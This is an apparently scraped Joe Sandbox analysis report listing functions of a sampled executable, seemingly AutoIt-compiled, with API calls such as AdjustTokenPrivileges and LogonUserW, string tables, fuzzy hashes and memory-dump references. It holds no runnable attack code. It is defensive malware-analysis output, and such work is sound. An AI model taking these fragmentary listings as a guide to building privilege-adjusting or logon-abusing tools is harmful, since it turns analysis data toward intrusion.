Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 0f82533732454de7aaaf70693eb09730bdae00841f31d6244936f23d51da6ab4
Instruction ID: 21531fc501f80cac2d7d2a1011a678cc592b5c444ccc9bb1937cd23beb613f1f
Opcode Fuzzy Hash: 0f82533732454de7aaaf70693eb09730bdae00841f31d6244936f23d51da6ab4
Instruction Fuzzy Hash: 3EF0823515522EABDB229FA4DC48FEA776CBF09361F008165F919D7181DA309944CBA1

Function 003E81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003E8309), ref: 003E81E0
CloseHandle.KERNEL32(?,?,003E8309), ref: 003E81F2

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: a7fe6c991ca108341ddbdcc660ae2029111129282dace7a20bd4faa3268cd3c9
Instruction ID: f4c11d6bf163afc64a693fab21d0d87528ec5f00a49748854e78538df7af0b2b
Opcode Fuzzy Hash: a7fe6c991ca108341ddbdcc660ae2029111129282dace7a20bd4faa3268cd3c9
Instruction Fuzzy Hash: F8E0EC72410A10AFE7262B61EC09DB77BEAEF04354714C93DF9AA84870DB62AC91DB14

Function 003BA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,003B8D57,?,?,?,00000001), ref: 003BA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003BA163

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b204520bd3807fbf9f685b35b174deb891ce1bbe50233ca1a02d3bef0f6fea60
Instruction ID: 8e7ff411c88dc97c846234f077f839e82f7c08cd31c8fdd83557e5f5a65e7bb2
Opcode Fuzzy Hash: b204520bd3807fbf9f685b35b174deb891ce1bbe50233ca1a02d3bef0f6fea60
Instruction Fuzzy Hash: 06B0923105420CEBCA002B91EC09BC83F68FB44BA2F408030FA1D84C60CB6254568A99

Function 003BF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a0da3cec45427c29c366baf77d352488ea966ef16dc4c9d68e3513027a988fc
Instruction ID: 95ebee6f429dd16e35d53f27fc4c352d11ae166ed2f103f62cda4db0a7697046
Opcode Fuzzy Hash: 2a0da3cec45427c29c366baf77d352488ea966ef16dc4c9d68e3513027a988fc
Instruction Fuzzy Hash: 8632F222E29F014DD7239638DC32336A648AFB73C8F55E737E919B5DA6EB28D4834104

Function 003C242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03c4411f1f463b4a88c913716c3b6929b8ea7a5336f44435f5b55bf866d5e79c
Instruction ID: 690df17204e5132d6da8f01af7cb574e385cb8df2e42cf0e89a198d33557ebb9
Opcode Fuzzy Hash: 03c4411f1f463b4a88c913716c3b6929b8ea7a5336f44435f5b55bf866d5e79c
Instruction Fuzzy Hash: 4DB1F220E2AF414ED323A6398831336B65CAFBB2D5F91D72BFC1674D22EB2185934245

Function 003F4C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003F4C4A

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 5e7114d780094d9d3e7e57b32fe01850afa386adcfd7c12525aa5b82efeb48c9
Instruction ID: 56f31448c3c95ccd9362b47f46cf7e05394a8c1c30ec7410e8a5ee52fdebcb56
Opcode Fuzzy Hash: 5e7114d780094d9d3e7e57b32fe01850afa386adcfd7c12525aa5b82efeb48c9
Instruction Fuzzy Hash: ADD05E9116520D78EC1E0720AE0FF7B0108E300782FD2A19973028A4D2EC855C445030

Function 003E87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003E8389), ref: 003E87D1

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: f982abca5a2c297575e500f11ec5bd52884190a42c1f55db2a78938db56ce4ab
Instruction ID: 6dd07a3e79127b100e0fd94c1b98d335ca4a11bc76e8933b23e569cd42943fd5
Opcode Fuzzy Hash: f982abca5a2c297575e500f11ec5bd52884190a42c1f55db2a78938db56ce4ab
Instruction Fuzzy Hash: 46D09E3226450EABEF019EA4DD05EEE3B69EB04B01F408521FE15D51A1C775E935AB60

Function 003BA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 003BA12A

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 20977a1a18f8fe9c8d3e01b4d44c2929e439ec9a8a20de6627a153d9bb601342
Instruction ID: f89e24cd733bd71cd7c4c5734ac160e1dc97d64598696c060dded247f6053abe
Opcode Fuzzy Hash: 20977a1a18f8fe9c8d3e01b4d44c2929e439ec9a8a20de6627a153d9bb601342
Instruction Fuzzy Hash: CBA0113000020CAB8A002B82EC08888BFACEA002A0B008030F80C80822CB32A8228A88

Function 003A8808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed1bb117c3e07666ea0687d4af9556cfa1d2c1c255f38919836c90f19752ef82
Instruction ID: c47ed928606ac0e1d9e5fe04f9b88f99a2d83988a7210b832104938dfd119a9c
Opcode Fuzzy Hash: ed1bb117c3e07666ea0687d4af9556cfa1d2c1c255f38919836c90f19752ef82
Instruction Fuzzy Hash: 862246309045A6CBDF3B8B25C49477DB7A1FF42308F2A866AD9468B9D2DB34DC92C741

Function 003B21C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: e2501e4b892c4d3d24c910a294923a6626834f3894618c8bd164de33a323f2b9
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 7EC196362050930ADF6F463A84740BFFAA15EA27B935B075DD9B3CF9D4EE10C925D620

Function 003B25FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: d968f406965170b501da09d277095efc7ade7c5f828a7e88991a781b43c79f24
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: AEC1D3322051930ADF2F463AC4341BFBBA15EA27B536B076DD5B3DB8D5EE20C925D620

Function 003B1978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: d8c954a90779c0ceee15c473faed5c44b7742830802e47336a8b54e00a0044df
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 96C1A23231519309DF2E8639C4340BEFBA15EA27B939B076DD5B3CB9D4EE20D925D620

Function 0041356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0041F910), ref: 00413627
IsWindowVisible.USER32(?), ref: 0041364B

Strings

CHECK, xrefs: 0041386D
SELECTSTRING, xrefs: 00413806
CURRENTTAB, xrefs: 004136BD
DELSTRING, xrefs: 00413749
SHOWDROPDOWN, xrefs: 004136E0
ADDSTRING, xrefs: 00413716
ISCHECKED, xrefs: 00413839
GETCURRENTSELECTION, xrefs: 004137E3
GETSELECTED, xrefs: 004138A3
GETLINE, xrefs: 0041399B
TABRIGHT, xrefs: 0041369D
GETLINECOUNT, xrefs: 004138C6
SETCURRENTSELECTION, xrefs: 004137B6
HIDEDROPDOWN, xrefs: 00413700
ISENABLED, xrefs: 0041366B
GETCURRENTCOL, xrefs: 00413928
ISVISIBLE, xrefs: 00413637
UNCHECK, xrefs: 00413883
SENDCOMMANDID, xrefs: 004139DA
TABLEFT, xrefs: 00413687
EDITPASTE, xrefs: 0041395F
GETCURRENTLINE, xrefs: 004138ED
FINDSTRING, xrefs: 00413776

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 2321cbfac26bbb9ae1c1867ba0b37fde7f992a4e611b5f10b9d970df9aa2cf34
Instruction ID: da09f7de021b4b10c1b55b31488f68c8d4c0b89a685bbdf955798f9bba495bdc
Opcode Fuzzy Hash: 2321cbfac26bbb9ae1c1867ba0b37fde7f992a4e611b5f10b9d970df9aa2cf34
Instruction Fuzzy Hash: 64D1A3702143019BCB05EF10C452AAF77E5AF55394F14886AF8865F3E2DB35DE8ACB4A

Function 0041A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0041A630
GetSysColorBrush.USER32(0000000F), ref: 0041A661
GetSysColor.USER32(0000000F), ref: 0041A66D
SetBkColor.GDI32(?,000000FF), ref: 0041A687
SelectObject.GDI32(?,00000000), ref: 0041A696
InflateRect.USER32(?,000000FF,000000FF), ref: 0041A6C1
GetSysColor.USER32(00000010), ref: 0041A6C9
CreateSolidBrush.GDI32(00000000), ref: 0041A6D0
FrameRect.USER32(?,?,00000000), ref: 0041A6DF
DeleteObject.GDI32(00000000), ref: 0041A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 0041A731
FillRect.USER32(?,?,00000000), ref: 0041A763
GetWindowLongW.USER32(?,000000F0), ref: 0041A78E

Part of subcall function 0041A8CA: GetSysColor.USER32(00000012), ref: 0041A903
Part of subcall function 0041A8CA: SetTextColor.GDI32(?,?), ref: 0041A907
Part of subcall function 0041A8CA: GetSysColorBrush.USER32(0000000F), ref: 0041A91D
Part of subcall function 0041A8CA: GetSysColor.USER32(0000000F), ref: 0041A928
Part of subcall function 0041A8CA: GetSysColor.USER32(00000011), ref: 0041A945
Part of subcall function 0041A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0041A953
Part of subcall function 0041A8CA: SelectObject.GDI32(?,00000000), ref: 0041A964
Part of subcall function 0041A8CA: SetBkColor.GDI32(?,00000000), ref: 0041A96D
Part of subcall function 0041A8CA: SelectObject.GDI32(?,?), ref: 0041A97A
Part of subcall function 0041A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0041A999
Part of subcall function 0041A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0041A9B0
Part of subcall function 0041A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0041A9C5
Part of subcall function 0041A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0041A9ED

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 60190d4d01504138148015ceba28fb96d843159c6ae6cf5b1dc4da33f5a11152
Instruction ID: 9148ba81d275f904a2a620aa509db2561c85a2dca8936b5b9c64f479bfcaf703
Opcode Fuzzy Hash: 60190d4d01504138148015ceba28fb96d843159c6ae6cf5b1dc4da33f5a11152
Instruction Fuzzy Hash: D1918071009301FFC7119FA4DC08A9B7BA9FF48321F104B2AF966961E1D734D94ACB56

Function 00392C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00392CA2
DeleteObject.GDI32(00000000), ref: 00392CE8
DeleteObject.GDI32(00000000), ref: 00392CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00392CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00392D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 003CC43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003CC474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 003CC89D

Part of subcall function 00391B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00392036,?,00000000,?,?,?,?,003916CB,00000000,?), ref: 00391B9A

SendMessageW.USER32(?,00001053), ref: 003CC8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003CC8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 003CC907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 003CC912

Strings

0, xrefs: 003CC731

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 38c17fd703214b882224c22fbea33c9d86ce56e8e3473eed9ffcfe3899f1ad2b
Instruction ID: 22c63d7fd79c4ea8971d6d874e86dfa84656404a93ba11dee665fa80690b8815
Opcode Fuzzy Hash: 38c17fd703214b882224c22fbea33c9d86ce56e8e3473eed9ffcfe3899f1ad2b
Instruction Fuzzy Hash: 7E128A30610601AFDB26DF24C884BAABBA5FF05300F59957DE899DB662C731EC46CF91

Function 004074AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 004074DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0040759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004075DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004075ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00407633
GetClientRect.USER32(00000000,?), ref: 0040763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00407683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00407692
GetStockObject.GDI32(00000011), ref: 004076A2
SelectObject.GDI32(00000000,00000000), ref: 004076A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004076B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076BF
DeleteDC.GDI32(00000000), ref: 004076C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004076F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 0040770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00407746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0040775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 0040776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0040779B
GetStockObject.GDI32(00000011), ref: 004077A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004077B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004077BB

Strings

static, xrefs: 0040767D, 00407795
DISPLAY, xrefs: 00407688
AutoIt v3, xrefs: 0040762B
msctls_progress32, xrefs: 0040773C

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: b79f447453ef4a5c32a6a155364c443fe90cd7af6fb36b79fe38568f76e7ffc0
Instruction ID: 35ffe1b3bc84769f4274870030b949e3807b56997b93bfe31bce76bac26f0803
Opcode Fuzzy Hash: b79f447453ef4a5c32a6a155364c443fe90cd7af6fb36b79fe38568f76e7ffc0
Instruction Fuzzy Hash: FEA18371A40605BFEB14DBA4DC4AFEE7B79EB08710F008125FA14A72E1D774AD01CB68

Function 003FAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 003FAD1E
GetDriveTypeW.KERNEL32(?,0041FAC0,?,\\.\,0041F910), ref: 003FADFB
SetErrorMode.KERNEL32(00000000,0041FAC0,?,\\.\,0041F910), ref: 003FAF59

Strings

Unknown, xrefs: 003FAE1B, 003FAEBF
Removable, xrefs: 003FAE4D
\\.\, xrefs: 003FAD70
MMC, xrefs: 003FAF1A
Fixed, xrefs: 003FAE43
Network, xrefs: 003FAE39
ATA, xrefs: 003FAED4
Virtual, xrefs: 003FAF21
iSCSI, xrefs: 003FAEFE
SCSI, xrefs: 003FAEC6
1394, xrefs: 003FAEDB
RAMDisk, xrefs: 003FAE25
CDROM, xrefs: 003FAE2F
SAS, xrefs: 003FAF05
Fibre, xrefs: 003FAEE9
PhysicalDrive, xrefs: 003FADA7
SSA, xrefs: 003FAEE2
RAID, xrefs: 003FAEF7
SSD, xrefs: 003FAE86
ATAPI, xrefs: 003FAECD
FileBackedVirtual, xrefs: 003FAF28
SATA, xrefs: 003FAF0C
USB, xrefs: 003FAEF0

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
